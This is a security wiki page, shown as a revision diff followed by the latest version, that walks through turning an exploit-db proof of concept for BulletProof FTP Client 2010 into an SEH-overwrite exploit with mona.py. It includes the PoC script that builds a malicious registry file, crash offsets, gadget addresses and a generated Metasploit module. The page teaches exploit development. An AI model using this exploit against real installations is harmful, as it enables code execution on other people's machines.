Difference between revisions of "Test"

From Security Weekly Wiki
Jump to navigationJump to search
 
(16 intermediate revisions by 2 users not shown)
Line 1: Line 1:
{{#ev:bliptv|6562563}}
+
[[Episode128#Interview:_Jason_Ostrom Jason Ostrom]]
 +
=About & Why=
  
 +
Mona can be used by pentesters and exploit developers to take a proof of concept crash and turn it into a working exploit in a quick and organized fashion, eliminating downtime.
  
<center>
+
=How=
[[File:itunes2.png|link=http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=91472687|PaulDotCom iTunes]]
 
[[File:youtube.png|link=http://youtube.com/pauldotcom|PaulDotCom on YouTube]]
 
[[File:rss.png|link=http://feeds.feedburner.com/pauldotcom/XBIC|PaulDotCom Blog]]
 
[[File:facebook.png|link=https://www.facebook.com/pages/PaulDotCom-Security/56074056651|PaulDotCom Facebook Fan Page]]
 
[[File:twitter.png|link=http://www.twitter.com/pauldotcom|Follow Us On Twitter]]
 
[[File:linkedin.png|link=http://www.linkedin.com/profile/view?id=928145|LinkedIN]]
 
[[File:bliptv.png|link=http://blip.tv/pauldotcom|Blip.TV]]
 
[[File:google.png|link=https://plus.google.com/108998557249071696489|Google+]]
 
</center>
 
  
 
+
By using the framework Corelanc0d3r has made, it dissects the debugger and can evaluate stack, SEH, ROP & Egg hunters for you and put it out in a nice Metasploit skeleton. I've taken the below from a POC found on exploit-db to a metasploit framework.
=Getting Dirty With Mona : SEH Overwrite=
+
This tool makes me very excited, even though its been around for a while… I've just found it! And as far as I can tell, no one here has posted anything about it. So… Im going to walk through some basic exploit development with mona.py on Immunity Debugger with the following exploit POC : [http://www.exploit-db.com/exploits/18716/ POC ]
 
 
Despite the title, this isn't something that will legally requite opt-in if you are in the UK. This is a quick tutorial about corelan's mona.py. This tool makes me very excited, even though its been around for a while… I've just found it! And as far as I can tell, no one here has posted anything about it. So… Im going to walk through some basic exploit development with mona.py on Immunity Debugger with the following exploit POC : [http://www.exploit-db.com/exploits/18716/ POC ]
 
  
 
First, we need to go to [http://redmine.corelan.be/projects/mona corelan] to download mona and follow the setup. Which, is honestly a drag and drop operation with a few commands to get mona to output log files correctly (without overwriting)
 
First, we need to go to [http://redmine.corelan.be/projects/mona corelan] to download mona and follow the setup. Which, is honestly a drag and drop operation with a few commands to get mona to output log files correctly (without overwriting)
Line 110: Line 101:
 
'''We execute our code, in this case the python file will create a file.reg, the POC tells us why we need to put this in our registry. We then go and open our Bulletproof FTP client. '''
 
'''We execute our code, in this case the python file will create a file.reg, the POC tells us why we need to put this in our registry. We then go and open our Bulletproof FTP client. '''
  
'''Look at that! Our pattern is show at EAX and ESB…. great…. so how does that help us?'''
+
[[file:EBP.png]]
 +
 
 +
 
 +
'''Look at that! Our pattern is show at EAX and EBP…. great…. so how does that help us?'''
  
 
'''Im not sure, if i were looking at it normally, i would be looking for EIP… however, there are many ways to get our own code to execute…. lets ask Mona!'''
 
'''Im not sure, if i were looking at it normally, i would be looking for EIP… however, there are many ways to get our own code to execute…. lets ask Mona!'''
Line 120: Line 114:
  
 
(alternatively we can find offsets with !mona op xyz)
 
(alternatively we can find offsets with !mona op xyz)
 +
 +
[[file:Findmsp.png]]
  
 
<code>
 
<code>
Line 192: Line 188:
  
  
 
+
[[file:Stack.png]]
  
  
 
'''Alright, so this is an SEH overwrite exploit, so lets ask mona what to do:'''
 
'''Alright, so this is an SEH overwrite exploit, so lets ask mona what to do:'''
 
  
 
==!mona SEH==
 
==!mona SEH==
Line 202: Line 197:
  
 
'''Our list of Pop Pop Ret:'''
 
'''Our list of Pop Pop Ret:'''
 +
 +
[[file:Poppopret.png]]
  
 +
 +
<code>
 +
 +
0x004080d7 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x0040f1d8 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x0040f33c : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x004124b8 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x0041e207 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x0041e248 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x0041fa2c : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x004237b8 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x0042467b : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x004246bf : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x004273f1 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x0042ecb2 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x004329c3 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x004333fe : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x00433429 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x00434a20 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x00434b25 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x0043a5a7 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x0043a9bd : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x0043d1ca : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x0043d1f4 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
0x00444539 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)
 +
 +
</code>
 +
 +
(this is a partial list)
 +
 +
==!mona suggest==
 +
 +
'''This is rather interesting, Mona will give us a metasploit module based on the information in findmsp'''
 +
 +
[[file:monasuggest.png]]
 +
 +
<code>
 +
Output:
 +
 +
This module requires Metasploit: http://metasploit.com/download
 +
Current source: https://github.com/rapid7/metasploit-framework
 +
 +
require 'msf/core'
 +
 +
class Metasploit3 < Msf::Exploit::Remote
 +
  #Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
 +
  #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking
 +
  Rank = NormalRanking
 +
 +
  include Msf::Exploit::Remote::Tcp
 +
  include Msf::Exploit::Seh
 +
 +
  def initialize(info = {})
 +
    super(update_info(info,
 +
      'Name'    => 'insert name for the exploit',
 +
      'Description'  => %q{
 +
          Provide information about the vulnerability / explain as good as you can
 +
          Make sure to keep each line less than 100 columns wide
 +
      },
 +
      'License'    => MSF_LICENSE,
 +
      'Author'    =>
 +
        [
 +
          'insert_name_of_person_who_discovered_the_vulnerability<user[at]domain.com>',  # Original discovery
 +
          '<insert your name here>',  # MSF Module
 +
        ],
 +
      'References'  =>
 +
        [
 +
          [ 'OSVDB', '<insert OSVDB number here>' ],
 +
          [ 'CVE', 'insert CVE number here' ],
 +
          [ 'URL', '<insert another link to the exploit/advisory here>' ]
 +
        ],
 +
      'DefaultOptions' =>
 +
        {
 +
          'ExitFunction' => 'process', #none/process/thread/seh
 +
          #'InitialAutoRunScript' => 'migrate -f',
 +
        },
 +
      'Platform'  => 'win',
 +
      'Payload'  =>
 +
        {
 +
          'BadChars' => "", # <change if needed>
 +
          'DisableNops' => true,
 +
        },
 +
 +
      'Targets'    =>
 +
        [
 +
          [ '<fill in the OS/app version here>',
 +
            {
 +
              'Ret'    =>  0x007ecfef, # pop ebx # pop ebp # ret  - bpftpclient.exe
 +
              'Offset'  =>  444
 +
            }
 +
          ],
 +
        ],
 +
      'Privileged'  => false,
 +
      #Correct Date Format: "M D Y"
 +
      #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec
 +
      'DisclosureDate'  => 'MONTH DAY YEAR',
 +
      'DefaultTarget'  => 0))
 +
 +
    register_options([Opt::RPORT(21)], self.class)
 +
 +
  end
 +
 +
  def exploit
 +
 +
 +
    connect
 +
 +
    buffer = rand_text(target['Offset'])  #junk
 +
    buffer << generate_seh_record(target.ret)
 +
    buffer << payload.encoded  #104 bytes of space
 +
    # more junk may be needed to trigger the exception
 +
 +
    print_status("Trying target #{target.name}...")
 +
    sock.put(buffer)
 +
 +
    handler
 +
    disconnect
 +
 +
  end
 +
end
 +
 +
</code>
  
 
'''amazing stuff!!!'''
 
'''amazing stuff!!!'''
  
'''Stay turned for some more exploit fun!!!'''
+
'''Stay tuned for some more exploit fun!!!'''  
 +
 
 +
 
 +
=References=
 +
 
 +
[https://www.corelan.be/ https://www.corelan.be/ ]
 +
 
 +
[https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/ https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/]
 +
 
 +
[http://redmine.corelan.be/projects/mona http://redmine.corelan.be/projects/mona]
 +
 
 +
 
 +
(Tutorials and Mona.py are all  by Corelanc0d3r, i take no credit, I just think its an awesome tool!)
 +
 
 +
=Plugs=
 +
@rkornmeyer

Latest revision as of 16:36, 20 April 2017

Episode128#Interview:_Jason_Ostrom Jason Ostrom

About & Why

Mona can be used by pentesters and exploit developers to take a proof of concept crash and turn it into a working exploit in a quick and organized fashion, eliminating downtime.

How

By using the framework Corelanc0d3r has made, it dissects the debugger and can evaluate stack, SEH, ROP & Egg hunters for you and put it out in a nice Metasploit skeleton. I've taken the below from a POC found on exploit-db to a metasploit framework. This tool makes me very excited, even though its been around for a while… I've just found it! And as far as I can tell, no one here has posted anything about it. So… Im going to walk through some basic exploit development with mona.py on Immunity Debugger with the following exploit POC : POC

First, we need to go to corelan to download mona and follow the setup. Which, is honestly a drag and drop operation with a few commands to get mona to output log files correctly (without overwriting)

Now, pretty much every class I've taken on exploit development has relied on metasploit to generate and find memory offsets in the stack, registers & EIP. Mona makes this process simple… Lets take a look:


We tell mona to make us a pattern for the POC, in this case 552 bytes long


!mona pc 552

Mona tells us :

Output generated by mona.py v2.0, rev 447 - Immunity Debugger

Corelan Team - https://www.corelan.be

OS : xp, release 5.1.2600

Process being debugged : _no_name (pid 0)

2013-10-17 16:25:27

Pattern of 552 bytes :

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7A h8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7 Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3


We take that pattern, completely unique in structure, and inject it into our POC like so:



Exploit Title: BulletProof FTP Client v2010.75.0.76 Local Buffer Overflow

Version: 2010.75.0.76

Date: 2012-03-11

Author: Julien Ahrens

Homepage: http://www.inshell.net

Software Link: http://www.bpftp.com/

Tested on: Windows XP SP3 Professional German

Notes: -

Howto: Import Reg -> Start App

file="poc.reg"

junk1="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3"


poc="Windows Registry Editor Version 5.00\n\n"

poc=poc + "[HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client 2010\Options]\n"

poc=poc + "\"LogFileName\"=\"" + junk1 + "\""

try:

print "[*] Creating exploit file...\n";

writeFile = open (file, "w")

writeFile.write( poc )

writeFile.close()

print "[*] File successfully created!";

except:

print "[!] Error while creating file!";



We execute our code, in this case the python file will create a file.reg, the POC tells us why we need to put this in our registry. We then go and open our Bulletproof FTP client.

EBP.png


Look at that! Our pattern is show at EAX and EBP…. great…. so how does that help us?

Im not sure, if i were looking at it normally, i would be looking for EIP… however, there are many ways to get our own code to execute…. lets ask Mona!

We type in :

!Mona findmsp

(alternatively we can find offsets with !mona op xyz)

Findmsp.png

We get the following results:

[+] Looking for cyclic pattern in memory

Cyclic pattern (normal) found at 0x0012fa40 (length 552 bytes)

Stack pivot between 172 & 724 bytes needed to land in this pattern

Cyclic pattern (normal) found at 0x016657d8 (length 552 bytes)

EAX overwritten with normal pattern : 0x41366e41 (offset 408)

EBP (0x0012fbf4) points at offset 436 in normal pattern (length 116)

[+] Examining SEH chain

SEH record (nseh field) at 0x0012fbfc overwritten with normal pattern : 0x7041396f (offset 444), followed by 104 bytes of cyclic data

[+] Examining stack (entire stack) - looking for cyclic pattern

Walking stack from 0x00128000 to 0x0012fffc (0x00007ffc bytes)

0x0012fa40 : Contains normal cyclic pattern at ESP+0xac (+172) : offset 0, length 552 (-> 0x0012fc67 : ESP+0x2d4)

[+] Examining stack (entire stack) - looking for pointers to cyclic pattern

Walking stack from 0x00128000 to 0x0012fffc (0x00007ffc bytes)

0x0012da1c : Pointer into normal cyclic pattern at ESP-0x1f78 (-8056) : 0x0012fa68 : offset 40, length 512

0x0012eb3c : Pointer into normal cyclic pattern at ESP-0xe58 (-3672) : 0x0012fc24 : offset 484, length 68

0x0012eba4 : Pointer into normal cyclic pattern at ESP-0xdf0 (-3568) : 0x0012fc24 : offset 484, length 68

0x0012ebbc : Pointer into normal cyclic pattern at ESP-0xdd8 (-3544) : 0x0012fc24 : offset 484, length 68

0x0012f948 : Pointer into normal cyclic pattern at ESP-0x4c (-76) : 0x0012fa40 : offset 0, length 552

0x0012f954 : Pointer into normal cyclic pattern at ESP-0x40 (-64) : 0x0012fa40 : offset 0, length 552

0x0012f958 : Pointer into normal cyclic pattern at ESP-0x3c (-60) : 0x0012fbf4 : offset 436, length 116

0x0012f960 : Pointer into normal cyclic pattern at ESP-0x34 (-52) : 0x0012fa40 : offset 0, length 552

0x0012f99c : Pointer into normal cyclic pattern at ESP+0x8 (+8) : 0x0012fbf4 : offset 436, length 116

0x0012f9a0 : Pointer into normal cyclic pattern at ESP+0xc (+12) : 0x0012fbfc : offset 444, length 108

0x0012f9a8 : Pointer into normal cyclic pattern at ESP+0x14 (+20) : 0x0012fbf4 : offset 436, length 116

0x0012fa0c : Pointer into normal cyclic pattern at ESP+0x78 (+120) : 0x0012fb44 : offset 260, length 292

0x0012fcf8 : Pointer into normal cyclic pattern at ESP+0x364 (+868) : 0x016657d8 : offset 0, length 552

Wow, it took Mona a couple seconds to do that…. It might of taken me a while to figure all that out.

In this particular instance, the following is interesting :

[+] Examining SEH chain

SEH record (nseh field) at 0x0012fbfc overwritten with normal pattern : 0x7041396f (offset 444), followed by 104 bytes of cyclic data

Lets go look at that in the stack:


Stack.png


Alright, so this is an SEH overwrite exploit, so lets ask mona what to do:

!mona SEH

Our list of Pop Pop Ret:

Poppopret.png


0x004080d7 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0040f1d8 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0040f33c : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004124b8 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0041e207 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0041e248 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0041fa2c : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004237b8 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0042467b : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004246bf : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004273f1 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0042ecb2 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004329c3 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x004333fe : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x00433429 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x00434a20 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x00434b25 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0043a5a7 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0043a9bd : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0043d1ca : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x0043d1f4 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

0x00444539 : pop ecx # pop ebp # ret 0x04 | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READ} [bpftpclient.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2010.75.0.76 (C:\Program Files\BulletProof FTP Client 2010\bpftpclient.exe)

(this is a partial list)

!mona suggest

This is rather interesting, Mona will give us a metasploit module based on the information in findmsp

Monasuggest.png

Output:

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

 #Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
 #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking
 Rank = NormalRanking
 include Msf::Exploit::Remote::Tcp
 include Msf::Exploit::Seh
 def initialize(info = {})
   super(update_info(info,
     'Name'    => 'insert name for the exploit',
     'Description'  => %q{
         Provide information about the vulnerability / explain as good as you can
         Make sure to keep each line less than 100 columns wide
     },
     'License'    => MSF_LICENSE,
     'Author'    =>
       [
         'insert_name_of_person_who_discovered_the_vulnerability<user[at]domain.com>',  # Original discovery
         '<insert your name here>',  # MSF Module
       ],
     'References'  =>
       [
         [ 'OSVDB', '<insert OSVDB number here>' ],
         [ 'CVE', 'insert CVE number here' ],
         [ 'URL', '<insert another link to the exploit/advisory here>' ]
       ],
     'DefaultOptions' =>
       {
         'ExitFunction' => 'process', #none/process/thread/seh
         #'InitialAutoRunScript' => 'migrate -f',
       },
     'Platform'  => 'win',
     'Payload'  =>
       {
         'BadChars' => "", # <change if needed>
         'DisableNops' => true,
       },
     'Targets'    =>
       [
         [ '<fill in the OS/app version here>',
           {
             'Ret'     =>  0x007ecfef, # pop ebx # pop ebp # ret  - bpftpclient.exe
             'Offset'  =>  444
           }
         ],
       ],
     'Privileged'  => false,
     #Correct Date Format: "M D Y"
     #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec
     'DisclosureDate'  => 'MONTH DAY YEAR',
     'DefaultTarget'  => 0))
   register_options([Opt::RPORT(21)], self.class)
 end
 def exploit


   connect
   buffer = rand_text(target['Offset'])  #junk
   buffer << generate_seh_record(target.ret)
   buffer << payload.encoded  #104 bytes of space
   # more junk may be needed to trigger the exception
   print_status("Trying target #{target.name}...")
   sock.put(buffer)
   handler
   disconnect
 end

end

amazing stuff!!!

Stay tuned for some more exploit fun!!!


References

https://www.corelan.be/

https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/

http://redmine.corelan.be/projects/mona


(Tutorials and Mona.py are all by Corelanc0d3r, i take no credit, I just think its an awesome tool!)

Plugs

@rkornmeyer